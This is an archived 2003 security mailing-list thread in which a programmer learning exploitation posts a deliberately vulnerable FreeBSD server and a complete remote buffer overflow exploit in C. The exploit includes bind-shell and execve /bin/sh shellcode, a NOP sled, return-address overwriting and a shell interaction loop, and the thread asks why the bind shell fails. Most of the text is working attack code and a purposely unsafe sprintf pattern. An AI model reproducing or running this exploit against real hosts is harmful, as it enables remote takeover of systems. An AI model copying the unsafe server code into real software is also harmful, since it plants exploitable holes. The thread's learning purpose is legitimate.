Re: sample buffer overflow exploit problem

From: Ganbold (ganbold_at_micom.mng.net)
Date: 09/28/03

  • Next message: Ganbold: "Re: sample buffer overflow exploit problem"
    Date: Sun, 28 Sep 2003 15:06:29 +0900
    To: "deepcode ." <pondermate@hotmail.com>
    
    

    I don't know exactly what's wrong, but I suspect there might be a problem
    with shellcode.
    I tried to connect from different host and it is not working, the same
    problem, connection drops.

    Ganbold

    At 11:37 PM 9/27/2003 -0300, you wrote:

    >You say that you can connect after the exploit, but then the connection
    >gets dropped immediately afterwards... is there a firewall in place?
    >
    >>From: Ganbold <ganbold@micom.mng.net>
    >>To: vuln-dev@securityfocus.com
    >>Subject: sample buffer overflow exploit problem
    >>Date: Sat, 27 Sep 2003 16:54:59 +0900
    >>
    >>Hi,
    >>
    >>I'm very new to buffer overflow exploit technics and my boss wants me to
    >>thoroughly understand
    >>how it works. I'm trying to exploit sample network server in FreeBSD 5.1
    >>for this purpose.
    >>When I try to exploit using execve /bin/sh (shellcode1), it works and
    >>launches the shell in the remote machine.
    >>However when I try to use port binding shell code, it binds shell to the
    >>port, but when I try to connect to
    >>it, it just closes the connection. Also I can't connect to bind port
    >>after sending buffer using following code snippets:
    >>..............
    >> printf("[-] Connecting to bindshell...\n");
    >> remote.sin_family = AF_INET;
    >> remote.sin_addr = *((struct in_addr *)host->h_addr);
    >> remote.sin_port = htons(12345);
    >> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
    >> {
    >> close(s);
    >> fprintf(stderr, "Error: connect\n");
    >> return -1;
    >> }
    >> exec_sh(s);
    >>...............
    >>
    >>I appreciate if somebody give me some help to solve this test problem.
    >>Is there anywhere I can find detailed explanation about buffer overflows
    >>and working sample network exploits?
    >>Is there anyway I can generate shellcodes in FreeBSD?
    >>
    >>I attached my sample server code and exploit code.
    >>
    >>thanks in advance,
    >>
    >>Ganbold Ts,
    >>
    >>senior programmer,
    >>Micom Co., Ltd
    >>Ulaanbaatar,
    >>Mongolia
    >>
    >>
    >>
    >>Following is network server code:
    >>--------------------------------------------------------------------------------------------------------------------------------
    >>#include <stdio.h>
    >>#include <netinet/in.h>
    >>#include <netdb.h>
    >>#include <sys/socket.h>
    >>#include <sys/types.h>
    >>#include <errno.h>
    >>
    >>#define BUFFER_SIZE 1024
    >>#define NAME_SIZE 2048
    >>
    >>int handle(int c)
    >>{
    >> char buffer[BUFFER_SIZE], name[NAME_SIZE];
    >> int bytes;
    >> strcpy(buffer, "Your name?: ");
    >> bytes = send(c, buffer, strlen(buffer), 0);
    >> if (bytes == -1)
    >> return -1;
    >> bytes = recv(c, name, sizeof(name), 0);
    >> if (bytes == -1)
    >> return -1;
    >> name[bytes - 1] = '\0';
    >> sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
    >> bytes = send(c, buffer, strlen(buffer), 0);
    >> if (bytes == -1)
    >> return -1;
    >> return 0;
    >>}
    >>
    >>
    >>int main(int argc, char *argv[])
    >>{
    >> int s, c, cli_size;
    >> struct sockaddr_in srv, cli;
    >> if (argc != 2)
    >> {
    >> fprintf(stderr, "usage: %s port\n", argv[0]);
    >> return 1;
    >> }
    >> s = socket(AF_INET, SOCK_STREAM, 0);
    >> if (s == -1)
    >> {
    >> perror("socket() failed");
    >> return 2;
    >> }
    >> srv.sin_addr.s_addr = INADDR_ANY;
    >> srv.sin_port = htons( (unsigned short int) atol(argv[1]));
    >> srv.sin_family = AF_INET;
    >> if (bind(s, &srv, sizeof(srv)) == -1)
    >> {
    >> perror("bind() failed");
    >> return 3;
    >> }
    >> if (listen(s, 3) == -1)
    >> {
    >> perror("listen() failed");
    >> return 4;
    >> }
    >> for(;;)
    >> {
    >> c = accept(s, &cli, &cli_size);
    >> if (c == -1)
    >> {
    >> perror("accept() failed");
    >> return 5;
    >> }
    >> fprintf(stderr,"client from %s\n", inet_ntoa(cli.sin_addr));
    >> if (handle(c) == -1)
    >> fprintf(stderr, "%s: handle() failed", argv[0]);
    >> close(c);
    >> }
    >> return 0;
    >>}
    >>--------------------------------------------------------------------------------------------------------------------------------
    >>
    >>Following is the sample exploit code:
    >>--------------------------------------------------------------------------------------------------------------------------------
    >>#include <stdio.h>
    >>#include <netinet/in.h>
    >>#include <netdb.h>
    >>#include <sys/socket.h>
    >>#include <sys/types.h>
    >>#include <errno.h>
    >>#include <unistd.h>
    >>
    >>/*
    >> * FreeBSD shellcode - binds /bin/sh to a port 12345
    >> *
    >> * Claes M. Nyberg 20020619
    >> *
    >> * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
    >> */
    >>char shellcode[] = /* port _______*/
    >>
    >>"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
    >>
    >>"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
    >>
    >>"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
    >>
    >>"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
    >>
    >>"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
    >>
    >>"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    >>
    >>"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
    >> "\x40\x50\x50\xcd\x80";
    >>
    >>/*
    >> * FreeBSD shellcode - execve /bin/sh
    >> *
    >> * Claes M. Nyberg 20020120
    >> *
    >> * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
    >> */
    >>char shellcode1[] =
    >> "\x31\xc0" /* xorl %eax, %eax */
    >> "\x50" /* pushl %eax */
    >> "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
    >> "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
    >> "\x89\xe3" /* movl %esp, %ebx */
    >> "\x50" /* pushl %eax */
    >> "\x53" /* pushl %ebx */
    >> "\x89\xe2" /* movl %esp, %edx */
    >> "\x50" /* pushl %eax */
    >> "\x52" /* pushl %edx */
    >> "\x53" /* pushl %ebx */
    >> "\x50" /* pushl %eax */
    >> "\xb0\x3b" /* movb $0x3b, %al */
    >> "\xcd\x80" /* int $0x80 */
    >> "\x31\xc0" /* xorl %eax, %eax */
    >> "\x40" /* inc %eax */
    >> "\x50" /* pushl %eax */
    >> "\x50" /* pushl %eax */
    >> "\xcd\x80"; /* int $0x80 */
    >>
    >>#define RET 0xbfbffa48
    >>
    >>int exec_sh(int sockfd)
    >>{
    >> char snd[4096],rcv[4096];
    >> fd_set rset;
    >> while(1)
    >> {
    >> FD_ZERO(&rset);
    >> FD_SET(fileno(stdin),&rset);
    >> FD_SET(sockfd,&rset);
    >> select(255,&rset,NULL,NULL,NULL);
    >> if(FD_ISSET(fileno(stdin),&rset))
    >> {
    >> memset(snd,0,sizeof(snd));
    >> fgets(snd,sizeof(snd),stdin);
    >> write(sockfd,snd,strlen(snd));
    >> }
    >> if(FD_ISSET(sockfd,&rset))
    >> {
    >> memset(rcv,0,sizeof(rcv));
    >> if(read(sockfd,rcv,sizeof(rcv))<=0)
    >> exit(0);
    >> fputs(rcv,stdout);
    >> }
    >> }
    >>}
    >>
    >>int main(int argc, char *argv[]) {
    >>
    >> char buffer[1064];
    >> int s,t, i, size;
    >> struct sockaddr_in remote;
    >> struct hostent *host;
    >>
    >> if(argc != 3) {
    >> printf("Usage: %s target-ip port\n", argv[0]);
    >> return -1;
    >> }
    >>
    >> // filling buffer with NOPs
    >> memset(buffer, 0x90, 1064);
    >>
    >> //copying shellcode into buffer
    >> memcpy(buffer+1001-sizeof(shellcode) , shellcode,
    >> sizeof(shellcode));
    >>
    >> // the previous statement causes a unintential Nullbyte at
    >> buffer[1000]
    >> buffer[1000] = 0x90;
    >>
    >> // Copying the return address multiple times at the end of the
    >> buffer...
    >> for(i=1022; i < 1059; i+=4) {
    >> * ((int *) &buffer[i]) = RET;
    >> }
    >>
    >> buffer[1063] = 0x0;
    >>
    >> //getting hostname
    >>
    >> host=gethostbyname(argv[1]);
    >> if (host==NULL)
    >> {
    >> fprintf(stderr, "Unknown Host %s\n",argv[1]);
    >> return -1;
    >> }
    >>
    >> // creating socket...
    >> s = socket(AF_INET, SOCK_STREAM, 0);
    >> if (s < 0)
    >> {
    >> fprintf(stderr, "Error: Socket\n");
    >> return -1;
    >> }
    >> remote.sin_family = AF_INET;
    >> remote.sin_addr = *((struct in_addr *)host->h_addr);
    >> remote.sin_port = htons(atoi(argv[2]));
    >> // connecting with destination host
    >> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
    >> {
    >> close(s);
    >> fprintf(stderr, "Error: connect\n");
    >> return -1;
    >> }
    >> //sending exploit string
    >> size = send(s, buffer, sizeof(buffer), 0);
    >> if (size==-1)
    >> {
    >> close(s);
    >> fprintf(stderr, "sending data failed\n");
    >> return -1;
    >> }
    >>/*
    >> printf("[-] Connecting to bindshell...\n");
    >> remote.sin_family = AF_INET;
    >> remote.sin_addr = *((struct in_addr *)host->h_addr);
    >> remote.sin_port = htons(12345);
    >> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
    >> {
    >> close(s);
    >> fprintf(stderr, "Error: connect\n");
    >> return -1;
    >> }
    >> exec_sh(s);
    >>*/
    >> // closing socket
    >> close(s);
    >>}
    >>
    >>--------------------------------------------------------------------------------------------------------------------------------
    >>
    >>
    >
    >_________________________________________________________________
    >STOP MORE SPAM with the new MSN 8 and get 2 months FREE*
    >http://join.msn.com/?page=features/junkmail
    >
    >


  • Next message: Ganbold: "Re: sample buffer overflow exploit problem"

    Relevant Pages

    • [EXPL] Metamail Buffer Overflow Exploit (From Header)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... UDP port at 13330. ... Now you can send your shellcode to port 13330, ... int gen_nops ...
      (Securiteam)
    • Re: about shell code(expoit code) detector...
      ... about shell codedetector... ... You can detect exploits, not shellcode or. ... You could use anything that works with edx or any other reg that isn't used ...
      (Focus-IDS)
    • Re: jizzy.c -- sendmail remote exploit (POSSIBLE TROJAN)
      ... That's what's usually in the shellcode. ... >>another shell running as the user running the program. ... >It connects to an SMTP server and sends the shellcode, ...
      (comp.security.unix)
    • Re: jizzy.c -- sendmail remote exploit (POSSIBLE TROJAN)
      ... That's what's usually in the shellcode. ... >>another shell running as the user running the program. ... >It connects to an SMTP server and sends the shellcode, ...
      (comp.security.unix)
    • Re: buffer overflow to spawn shell
      ... I did not say I wrote a shell: I said I have one working on my computer ... Since I am quiet a newbie with buffer overflows exploits and I want to ... where have you got shellcode from? ...
      (comp.os.linux.security)